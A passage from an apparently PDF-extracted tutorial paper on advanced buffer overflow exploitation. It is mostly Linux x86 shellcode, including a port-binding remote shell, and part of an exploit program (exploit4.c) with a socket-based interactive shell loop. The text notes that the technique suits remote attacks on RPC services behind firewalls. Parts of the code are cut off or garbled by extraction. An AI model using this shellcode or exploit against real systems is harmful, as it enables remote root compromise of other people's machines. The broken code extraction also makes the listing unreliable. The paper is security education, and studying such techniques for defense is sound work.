"\xb8\x2f\x73\x68\x2f" /* movl $0x2f68732f,%eax *//* %eax="/sh/" */"\x89\x46\x04" /* movl %eax,0x4(%esi) */"\x31\xc0" /* xorl %eax,%eax */"\x88\x46\x07" /* movb %al,0x7(%esi) */"\x89\x76\x08" /* movl %esi,0x8(%esi) */"\x89\x46\x0c" /* movl %eax,0xc(%esi) */"\xb0\x0b" /* movb $0xb,%al */"\x89\xf3" /* movl %esi,%ebx */"\x8d\x4e\x08" /* leal 0x8(%esi),%ecx */"\x8d\x56\x0c" /* leal 0xc(%esi),%edx */


21/25

"\xcd\x80" /* int $0x80 */"\x31\xc0" /* xorl %eax,%eax */"\xb0\x01" /* movb $0x1,%al */"\x31\xdb" /* xorl %ebx,%ebx */"\xcd\x80" /* int $0x80 */"\xe8\x5b\xff\xff\xff"; /* call -0xa5 */

----------------------------------------------------------------------------

6.4 Exploit vulnerable4 programWith this shellcode, you can make an exploit code easily. And You have tomake code which connects to the socket.

exploit4.c----------------------------------------------------------------------------#include#include#include#include#include

#define ALIGN 0

#define OFFSET 0#define RET_POSITION 1024#define RANGE 20#define NOP 0x90

char shellcode[]="\x31\xc0" /* xorl %eax,%eax */"\xb0\x02" /* movb $0x2,%al */"\xcd\x80" /* int $0x80 */"\x85\xc0" /* testl %eax,%eax */"\x75\x43" /* jne 0x43 */"\xeb\x43" /* jmp 0x43 */"\x5e" /* popl %esi */

"\x31\xc0" /* xorl %eax,%eax */"\x31\xdb" /* xorl %ebx,%ebx */"\x89\xf1" /* movl %esi,%ecx */"\xb0\x02" /* movb $0x2,%al */"\x89\x06" /* movl %eax,(%esi) */"\xb0\x01" /* movb $0x1,%al */"\x89\x46\x04" /* movl %eax,0x4(%esi) */"\xb0\x06" /* movb $0x6,%al */"\x89\x46\x08" /* movl %eax,0x8(%esi) */"\xb0\x66" /* movb $0x66,%al */"\xb3\x01" /* movb $0x1,%bl */"\xcd\x80" /* int $0x80 */"\x89\x06" /* movl %eax,(%esi) */

"\xb0\x02" /* movb $0x2,%al */"\x66\x89\x46\x0c" /* movw %ax,0xc(%esi) */"\xb0\x77" /* movb $0x77,%al */"\x66\x89\x46\x0e" /* movw %ax,0xe(%esi) */"\x8d\x46\x0c" /* leal 0xc(%esi),%eax */"\x89\x46\x04" /* movl %eax,0x4(%esi) */"\x31\xc0" /* xorl %eax,%eax */"\x89\x46\x10" /* movl %eax,0x10(%esi) */"\xb0\x10" /* movb $0x10,%al */"\x89\x46\x08" /* movl %eax,0x8(%esi) */"\xb0\x66" /* movb $0x66,%al */


22/25

"\xb3\x02" /* movb $0x2,%bl */"\xcd\x80" /* int $0x80 */"\xeb\x04" /* jmp 0x4 */"\xeb\x55" /* jmp 0x55 */"\xeb\x5b" /* jmp 0x5b */"\xb0\x01" /* movb $0x1,%al */"\x89\x46\x04" /* movl %eax,0x4(%esi) */"\xb0\x66" /* movb $0x66,%al */

"\xb3\x04" /* movb $0x4,%bl */"\xcd\x80" /* int $0x80 */"\x31\xc0" /* xorl %eax,%eax */"\x89\x46\x04" /* movl %eax,0x4(%esi) */"\x89\x46\x08" /* movl %eax,0x8(%esi) */"\xb0\x66" /* movb $0x66,%al */"\xb3\x05" /* movb $0x5,%bl */"\xcd\x80" /* int $0x80 */"\x88\xc3" /* movb %al,%bl */"\xb0\x3f" /* movb $0x3f,%al */"\x31\xc9" /* xorl %ecx,%ecx */"\xcd\x80" /* int $0x80 */"\xb0\x3f" /* movb $0x3f,%al */

"\xb1\x01" /* movb $0x1,%cl */"\xcd\x80" /* int $0x80 */"\xb0\x3f" /* movb $0x3f,%al */"\xb1\x02" /* movb $0x2,%cl */"\xcd\x80" /* int $0x80 */"\xb8\x2f\x62\x69\x6e" /* movl $0x6e69622f,%eax */"\x89\x06" /* movl %eax,(%esi) */"\xb8\x2f\x73\x68\x2f" /* movl $0x2f68732f,%eax */"\x89\x46\x04" /* movl %eax,0x4(%esi) */"\x31\xc0" /* xorl %eax,%eax */"\x88\x46\x07" /* movb %al,0x7(%esi) */"\x89\x76\x08" /* movl %esi,0x8(%esi) */"\x89\x46\x0c" /* movl %eax,0xc(%esi) */

"\xb0\x0b" /* movb $0xb,%al */"\x89\xf3" /* movl %esi,%ebx */"\x8d\x4e\x08" /* leal 0x8(%esi),%ecx */"\x8d\x56\x0c" /* leal 0xc(%esi),%edx */"\xcd\x80" /* int $0x80 */"\x31\xc0" /* xorl %eax,%eax */"\xb0\x01" /* movb $0x1,%al */"\x31\xdb" /* xorl %ebx,%ebx */"\xcd\x80" /* int $0x80 */"\xe8\x5b\xff\xff\xff"; /* call -0xa5 */



long getip(char *name){

struct hostent *hp;long ip;if((ip=inet_addr(name))==-1){

if((hp=gethostbyname(name))==NULL){


23/25

fprintf(stderr,"Can't resolve host.\n");exit(0);

}memcpy(&ip,(hp->h_addr),4);

}return ip;

}

int exec_sh(int sockfd){

char snd[4096],rcv[4096];fd_set rset;while(1){

FD_ZERO(&rset);FD_SET(fileno(stdin),&rset);FD_SET(sockfd,&rset);select(255,&rset,NULL,NULL,NULL);if(FD_ISSET(fileno(stdin),&rset)){

memset(snd,0,sizeof(snd));

fgets(snd,sizeof(snd),stdin);write(sockfd,snd,strlen(snd));

}if(FD_ISSET(sockfd,&rset)){

memset(rcv,0,sizeof(rcv));if(read(sockfd,rcv,sizeof(rcv))


24/25

{char buff[RET_POSITION+RANGE+ALIGN+1],*ptr;long addr;unsigned long sp;int offset=OFFSET,bsize=RET_POSITION+RANGE+ALIGN+1;int i;int sockfd;




}

for(i=0;i


25/25

root----------------------------------------------------------------------------

6.5 What can you do with this technique?You can make various remote exploit code with this technique. If thevulnerable host is behind the firewall, you can open a socket in unfilteredport. This is a very useful technique when you attack rpc service with bufferoverflow.

7. SummaryThis paper introduced four buffer overflow techniques. They are pass throughfiltering, change uid back to 0, break chroot, and open socket. Thesetechniques will be very useful when you try to make a buffer overflow exploitcode. In addition, these techniques can be combined.All programers MUST be careful when making a setuid root program or serverprogram!!! PLEASE BE CAREFUL!!!!!

8. ReferencesSmashing The Stack For Fun And Profit by Aleph1wu-ftpd remote exploit code by dukeADMmountd remote exploit code by ADM

9. EtcSorry for my poor English. :(

Written by Taeho Oh ( [email protected] )----------------------------------------------------------------------------Taeho Oh ( [email protected] ) http://postech.edu/~ohharaPLUS ( Postech Laboratory for Unix Security ) http://postech.edu/plusPosLUG ( Postech Linux User Group ) http://postech.edu/group/poslug----------------------------------------------------------------------------

------------------------------------------

Special thanks to all of PLUS members. ^_^------------------------------------------

---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------

--

Taeho Oh ( [email protected] ) http://postech.edu/~ohharaPLUS ( Postech Laboratory for Unix Security ) http://postech.edu/plusPosLUG ( Postech Linux User Group ) http://postech.edu/group/poslug

advanced buffer overflow exploits

Documents